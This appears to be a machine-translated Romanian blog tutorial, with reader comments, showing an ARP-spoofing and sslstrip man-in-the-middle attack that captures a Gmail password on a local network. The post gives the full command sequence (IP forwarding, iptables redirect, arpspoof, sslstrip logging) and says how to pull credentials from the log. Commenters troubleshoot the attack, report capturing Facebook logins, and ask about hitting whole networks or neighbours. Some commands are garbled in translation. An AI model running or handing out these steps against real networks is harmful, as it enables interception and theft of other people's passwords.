Bună ziua Bloggerilor.
Astăzi am un mic eșantion de cât de periculos poate fi conectarea în orice rețea fără securitatea celor care ne plac atât de mulți dintre noi.
Pentru astăzi, voi folosi ArpSpoofing cu Sslstrip pentru a obține o parolă Gmail. Pentru a face mediul mai controlat, am creat un cont numit „testarp@gmail.com".
Și întrucât nu îmi plac prea mult preambulurile, să trecem la treabă.
MEDIU INCONJURATOR
Pentru acest test, ceea ce avem este următorul:
1. Atacant: Este desktopul sau computerul meu care are Debian Wheezy. Din depozite puteți instala sslstrip y adulmecă a ajunge să aibă arpsspoofing
2. Victima: Victima este o tabletă Android care vrea să-și vadă e-mailul doar prin browser.
3. Mediul: Mijlocul este al meu Router Cisco DPC2425
ADRESE.
Adresa atacatorului: 172.26.0.2
Adresa routerului: 172.26.0.1
Adresa victimei: 172.26.0.8
ATACUL:
Primul lucru pe care îl vom face pentru acest atac este să activăm transmiterea, astfel încât computerul nostru să poată transmite informațiile victimei fără ca acestea să observe. (Altfel ar fi un atac de refuz de servicii)
Pentru aceasta vom folosi:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Acum, dacă facem coada -f desdelinux vedem informația în direct și direct
Deci, cum putem obține ceea ce vrem?
Să introducem mai întâi e-mailul nostru pe tabletă. În timp ce ne conectăm, vedem că mii și mii de lucruri apar pe consola noastră.
Acum că s-a terminat, să deschidem fișierul nostru „desdelinux” cu nano
nano desdelinux
cu Control + W căutăm ceva numit SECURE POST.
Și vom vedea așa ceva.
Printre acea linie uriașă care nu poate fi văzută se numără e-mailul și parola victimei.
Așa că alergăm spre dreapta până când vom vedea în sfârșit lumina de la capătul tunelului.
Cu altă ocazie vom vedea cum ne putem proteja puțin de aceste atacuri.
În ceea ce priveşte
Profit de această ocazie pentru a spune că atunci când postarea a fost publicată, comenzile nu erau corecte.
Comenzii iptables de la sfârșit lipsește 8080 care se află pe altă linie. Și apoi comenzile arpspoof erau toate pe aceeași linie. Fiecare comandă fiind pe o linie diferită.
Sperăm că editorul o vede și o poate remedia.
Salutări.
Am făcut corecțiile pe care le menționați, este bine?
Dacă aveți de gând să inserați codul într-o intrare preferată, utilizați vizualizarea HTML și verificați dacă articolul este corect înainte de a-l trimite în așteptare. Mulțumesc.
Este îngrozitor să știm că cei dintre noi care nu au cunoștințe suntem atât de vulnerabili. Informații foarte bune chiar și atunci când înțeleg puțin subiectul îmi dau seama de importanță. Mulțumesc!
În ceea ce priveşte
Dar asta funcționează numai dacă atacatorul și victima se află în aceeași rețea. În orice caz, mi se pare că dacă (fiind în aceeași rețea) vă conectați utilizând HTTPS, acest lucru nu se întâmplă deoarece datele sunt criptate ÎNAINTE să părăsiți aparatul. Dacă vă conectați prin HTTP (fără S) cred că, chiar și uitându-vă la cablul de rețea, vedeți tastele.
Nu este adevarat. Hacking o parolă Gmail și dacă observați că Gmail folosește https. Asa de? Ideea este că, deși https este sigur, depinde de http. Deci nu este atât de sigur.
Nu mărturisi atât de mult despre un https că S nu este pentru Superman ci este pentru „sigur”
funcționează cu sau fără https, l-am încercat cu o distro Linux mai specializată și funcționează fără probleme
Îl puteți folosi cu precizie pentru a preda o lecție celor care vă fură Wi-Fi-ul. 😀
Seamănă mai mult sau mai puțin cu ceea ce spuneau ei cu mult timp în urmă pe blogul lui Chema Alonso:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, grozav ce face! / Și apoi îmi spun paranoicul meu de fiecare dată când folosesc VPN-ul când merg să verifice contul bancar ...). Apropo, trebuie să vedeți cât de cinici sunt oamenii în comentarii ... dacă până la urmă fură ...
Acum trebuie să luăm un tutorial despre cum să creați și să vă oferiți propriul serviciu VPN.
Povestea pe care o legați este foarte interesantă, pare chiar demnă de o carte nouă, iar acest lucru mă face să-mi amintesc când am folosit internetul vecinilor mei și, deși spun că cunosc subiectul, cred că nu aș putea vedea niciodată dimensiunile adevărate pericolul pe care l-aș fi putut rezista, din fericire pentru mine, au schimbat doar parola în WPA2 și de aici a început povestea mea cu ISP haha
De aceea titlul spune Sslstrip în acțiune.
Funcționează, atâta timp cât atacatorul este la mijloc
Ce val lucrezi la prismă? -.-
nr.
Ce așteptați pentru a trimite cererea dvs. XD
salutări
post bun
Interesant, voi face un test educațional mai târziu ... Poate aș putea chiar să scot parola de pe WiFi și să mă distrez puțin puțin 😛
Din întâmplare, puteți face ceva similar pentru a trimite pagini diferite către cele solicitate de țintă? De exemplu, vor să deschidă Facebook și eu le redirecționez către Google? 😛
Da. Dar totul este foarte diferit.
Poate îl voi posta mai târziu.
post foarte bun, aceste subiecte sunt foarte educative, acum trebuie să putem contracara acest atac, deoarece unii (ca mine) se conectează la rețelele publice (universitatea de exemplu) ar fi util să-l evităm.
Salutări!
Nu a funcționat pentru mine 🙁
Ceva îmi eșuează aici, în afară de faptul că conexiunile https sunt criptate printr-un certificat de server (odată ce ai certificatul pe computer, browserul tău se ocupă de criptare) cu iptables redirecționezi portul 80 (http), nu 443 , care este https
M-am gândit și eu la asta. Ideea este că, deși https este „sigur”, din păcate depinde de http. Deci, sslstrip profită de acest lucru, îl face pe browser să creadă că folosește acreditări https, dar nu este.
rahat sfânt! dar browserul ar trebui să vadă un avertisment de genul „acest certificat vine de la un site suspect sau ceva de genul ăsta” ... Cu siguranță va trebui să fac teste XD
Nu, nu iese absolut nimic.
În cele din urmă a funcționat pentru mine
Sunt conectat la o rețea WEP cu parolă și oricum mi-a arătat parola direct.
O interogare. Puteți face aceeași procedură, dar pentru toate computerele conectate în rețea, în loc să aveți o singură victimă?
Da, poti. Dar nu am făcut experimente. Încercați singur și spuneți-ne cum merge.
Singurul lucru pe care îl obțin este că mașina victimei se deconectează, dar sslstrip nu-mi arată nimic: /
Ar trebui să dezactivați paravanul de protecție pentru o clipă. Sau cel puțin activați conexiunile primite.
Probe și am putut vedea doar numele de utilizator și parola paginii de facebook, în gmail nu am găsit niciun rezultat în jurnal, de asemenea, am avut nevoie doar de o linie de arpspoof «arpspoof -i -t«. Pe de altă parte, aparatul victimei nu a putut deschide unele pagini. Voi continua să investighez, este foarte interesant. Un ajutor pentru cei care folosesc Manjaro, pachetele de instalat sunt: dsniff (aici este arpspoff), twisted și python2-pyopenssl. Sslstrip poate fi descărcat de aici: http://www.thoughtcrime.org/software/sslstrip/
Pentru a-l rula $ python2 sslstrip.py
Salutări.
Nu a ieșit, dar linia arpspoof este: #arpspoof -i int -t ip-victim ip-router
uite fac exact ceea ce spui:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
problema este că victima care este un alt computer pe care îl am aici în camera mea, nu am nicio legătură cu punctul în care trebuie să repornesc routerul, ce să mă ajute.
Un alt lucru pe care îl lucrez cu o mașină virtuală și când execut comanda iwconfig, nu apare wlan0 și nici când execut ifconfig, totuși, dacă am internet pe mașina mea virtuală, ce se întâmplă cu o interfață eth0.